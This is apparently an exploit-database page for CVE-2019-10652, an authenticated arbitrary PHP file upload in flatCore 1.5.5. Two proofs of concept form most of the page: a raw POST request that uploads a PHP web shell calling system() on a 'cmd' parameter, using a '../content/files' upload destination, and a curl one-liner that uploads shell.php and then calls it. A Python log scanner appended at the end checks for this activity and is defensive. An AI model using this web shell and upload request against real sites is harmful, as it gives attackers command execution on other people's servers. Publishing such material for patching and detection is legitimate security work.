📄 flatCore 1.5.5 Shell Upload

10 Apr 2025 00:00:00 | Reported by CodeSecLab | Type: packetstorm | Source: packetstorm.news | 238 Views

flatCore 1.5.5 allows an authenticated administrator to upload arbitrary PHP files through the admin panel (CVE-2019-10652).

Related

Reporter | Title | Published | Family
Circl | CVE-2019-10652 | 11 Apr 2025 21:02 | circl
CNVD | FlatCore Arbitrary File Upload Vulnerability | 1 Apr 2019 00:00 | cnvd
CVE | CVE-2019-10652 | 30 Mar 2019 13:48 | cve
Cvelist | CVE-2019-10652 | 30 Mar 2019 13:48 | cvelist
Exploit DB | flatCore 1.5.5 - Arbitrary File Upload | 10 Apr 2025 00:00 | exploitdb
EUVD | EUVD-2019-2452 | 7 Oct 2025 00:30 | euvd
NVD | CVE-2019-10652 | 30 Mar 2019 14:29 | nvd
Prion | Design/Logic Flaw | 30 Mar 2019 14:29 | prion
RedhatCVE | CVE-2019-10652 | 22 May 2025 08:08 | redhatcve

# Exploit Title: [flatCore Arbitrary .php File Upload via acp/acp.php]
    # Date: [2024-10-26]
    # Exploit Author: [CodeSecLab]
    # Vendor Homepage: [https://github.com/flatCore/flatCore-CMS] 
    # Software Link: [https://github.com/flatCore/flatCore-CMS]
    # Version: [1.5.5] 
    # Tested on: [Ubuntu Windows]
    # CVE : [CVE-2019-10652]
    PoC:
    1)
    1. Access the flatCore Admin Panel
    URL: http://flatcore/acp/acp.php
    Log in with valid administrative credentials.
    2. Upload a Malicious PHP File
    Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
    3. Intercept and Modify the Upload Request
    Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:
    
    POST /acp/core/files.upload-script.php HTTP/1.1
    Host: flatcore
    Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
    Content-Length: <calculated length>
    Cookie: PHPSESSID=<valid_session_id>
    
    -----------------------------735323031399963166993862150
    Content-Disposition: form-data; name="file"; filename="exploit.php"
    Content-Type: application/octet-stream
    
    <?php
    // Simple PHP backdoor code
    echo "Vulnerable File Upload - PoC";
    system($_GET['cmd']);
    ?>
    -----------------------------735323031399963166993862150
    Content-Disposition: form-data; name="upload_destination"
    
    ../content/files
    -----------------------------735323031399963166993862150
    Content-Disposition: form-data; name="csrf_token"
    
    <valid_csrf_token>
    -----------------------------735323031399963166993862150--

    Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
    4. Verification
    After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
    Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami
    
    PoC 
    2)
    # PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
    # Target URL: http://flatcore/
    # The attacker must be authenticated as an administrator to exploit this vulnerability
    
    # Step 1: Log in as an administrator and obtain the CSRF token
    # You need to obtain the CSRF token manually or through a script since the token is required for the file upload.
    
    # Step 2: Upload a malicious PHP file using the file upload feature
    
    # Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
    echo "<?php phpinfo(); ?>" > shell.php
    
    # Upload the PHP file using cURL
    curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
        -H "Content-Type: multipart/form-data" \
        -F "file=@shell.php" \
        -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
        -F "upload_destination=../content/files" \
        -F "file_mode=overwrite" \
        -b "PHPSESSID=YOUR_SESSION_ID_HERE"
    
    # Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID
    
    # Step 3: Access the uploaded malicious PHP file
    echo "Visit the following URL to execute the uploaded PHP file:"
    echo "http://flatcore/content/files/shell.php"
    
    This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
    [Replace Your Domain Name]
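
A defender-side check for the activity both PoCs produce, added here as an example (it is not part of the original advisory or of flatCore): it scans a web server access log for requests to script files under the upload directory and raises the severity when the same client POSTed to the upload endpoint earlier. The two paths come from the PoC above; Combined Log Format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

UPLOAD_ENDPOINT = "/acp/core/files.upload-script.php"  # endpoint used in the PoC
UPLOAD_DIR = "/content/files/"                         # upload_destination in the PoC
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Combined Log Format: client, timestamp, method, request target, status
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample access log (not taken from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Apr/2025:10:00:01 +0000] "POST /acp/core/files.upload-script.php HTTP/1.1" 200 12
198.51.100.7 - - [10/Apr/2025:10:00:09 +0000] "GET /content/files/exploit.php?cmd=whoami HTTP/1.1" 200 41
203.0.113.5 - - [10/Apr/2025:10:01:00 +0000] "GET /content/files/logo.png HTTP/1.1" 200 5120
203.0.113.5 - - [10/Apr/2025:10:02:00 +0000] "POST /acp/core/files.upload-script.php HTTP/1.1" 200 12
192.0.2.44 - - [10/Apr/2025:10:03:00 +0000] "GET /content/files/Shell.PHP HTTP/1.1" 404 0
malformed line
"""

def find_upload_dir_script_hits(log_text):
    """Return one finding per request for a script file under UPLOAD_DIR.

    Severity: 'high' if the script was served (2xx) and the same client had
    a successful POST to the upload endpoint earlier in the log, 'medium' if
    it was served without such a POST, 'low' if it was not served.
    """
    uploaders, findings = set(), []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not Combined Log Format
        client, ts, method, target, status = m.groups()
        path = urlsplit(target).path  # drop the query string before matching
        ok = status.startswith("2")
        if method == "POST" and path == UPLOAD_ENDPOINT and ok:
            uploaders.add(client)
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            sev = "high" if ok and client in uploaders else "medium" if ok else "low"
            findings.append({"client": client, "time": ts, "path": path,
                             "status": int(status), "severity": sev})
    return findings

if __name__ == "__main__":
    for finding in find_upload_dir_script_hits(SAMPLE_LOG):
        print(finding)
```

Any 2xx response for a script under the upload directory means the web server is executing or serving uploaded code there, so a 'medium' finding deserves the same follow-up as a 'high' one.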

10 Apr 2025 00:00 (current)
Vulners AI Score: 7.1 (High risk)
CVSS 2: 6.5
CVSS 3: 7.2
EPSS: 0.08267